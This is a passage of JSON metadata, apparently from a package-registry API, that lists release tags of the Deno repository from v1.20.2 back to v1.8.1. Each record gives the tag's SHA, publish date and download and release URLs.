f7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/